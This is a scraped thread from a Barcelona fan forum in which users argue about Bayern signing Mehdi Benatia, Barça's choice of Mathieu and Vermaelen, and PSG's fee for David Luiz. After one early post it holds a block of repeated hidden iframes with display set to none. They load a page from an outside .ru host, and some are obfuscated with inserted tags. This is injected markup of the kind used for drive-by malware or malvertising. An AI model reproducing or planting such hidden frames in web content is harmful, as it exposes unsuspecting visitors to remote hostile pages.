Mehdi Benatia

F

Flavia

Doesn't mean that not getting him wasn't a mistake. Nor does it mean that we can't point out that it was.

It has been pointed out all day long, not to mention all summer. No need for a broken record about it now.

<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

evilhita666

Barçapocalypse NOW!
Doesn't mean that not getting him wasn't a mistake. Nor does it mean that we can't point out that it was.

I hate to come out in defense of the idiots in our board, but there's no easy way we could have signed him...

Roma was going to ask a bazillion worth of money knowing our desperation, and we couldn't wait until the last days of the transfer period to negotiate, just imagine how worked up people would be if to this day we only had signed Mathieu... We needed the CBs as soon as possible to at least get to know them in pre-season and let Lucho get a hold of the squad...

And well, Bayern was in a good spot as nobody expected them to go for a CB, so it wasn't until the injury of Martinez that they decided it could be a possibilty, they weren't desperate like we were and with little time until the end of the transfer market they had everything in their advantage to negotiate and get a good deal...

PSG buy David Luiz for 60m. We offer 43m for Marquinhos. Meanwhile, Bayern buy Benatia for 30m.

This is how you do business.

Last edited:

Der Kaiser

PSG buy David Luiz for 60m. We offer 43m for Marquinhos. Meanwhile, Bayern buy Benatia for 30m.

This is how you do business.

Bayern know their shit when it comes to transfers. Lewa for free, Bernat for 10, Rode for free, Benatia for 30... only downside this window was Kroos, for whom they could have asked a lot more IMO.

Thank you :wub:

As we can see benatia does not fit Barcelona because he's outmatched by all the others.

edit; you should have added the "total score" stats too. Benatia is last as expected, yeah right.

How do the stats show that he doesn't fit? High pass completion, high % of aerial duels won, not a lot of errors, etc.

Dont even compare DL transfer to what Barcelona has done during this window.

Bayern aside, Zubi did good. Nasser did horrible.

I agree that nothing we did this window compares to the DL transfer. Except the Douglas transfer :(

I also agree that Zubi did pretty well this window EXCEPT on the CB issue (and, of course, Douglas). Even if Mathieu does well, not going for Benatia will still be a fuck up in my eyes unless, as I already said, Mathieu actually outperforms Benatia. But I'll take it over 60m for Luiz ;)

Last edited:

Bertus

I agree that nothing we did this window compares to the DL transfer. Except the Douglas transfer :(

I also agree that Zubi did pretty well this window EXCEPT on the CB issue (and, of course, Douglas). Even if Mathieu does well, not going for Benatia will still be a fuck up in my eyes unless, as I already said, Mathieu actually outperforms Benatia. But I'll take it over 60m for Luiz ;)

Gonna be honest, Mathieu will probably never outperform Benatia unless the later suffers from injuries.

But Mathieu doesn't need to do that to prove that he was a good choice.

If you want to question a transfer, do it about Vermi, not Mathieu.

I know some of you have issues with Mathieu's age, but he's a good choice.

Gonna be honest, Mathieu will probably never outperform Benatia unless the later suffers from injuries.

But Mathieu doesn't need to do that to prove that he was a good choice.

If you want to question a transfer, do it about Vermi, not Mathieu.

I know some of you have issues with Mathieu's age, but he's a good choice.

Yeah, I've already said that while I would have taken Benatia over either of them, I'd much rather have had Benatia + Mathieu than Benatia + Vermaelen.

The thing is, even if Mathieu proves he was a good choice, the fact still remains that a far better, younger one was available for not much more money. That's why the only way I won't see not getting Benatia as a fuck up is if Mathieu outperforms him.

Last edited:

Home of Barca Fans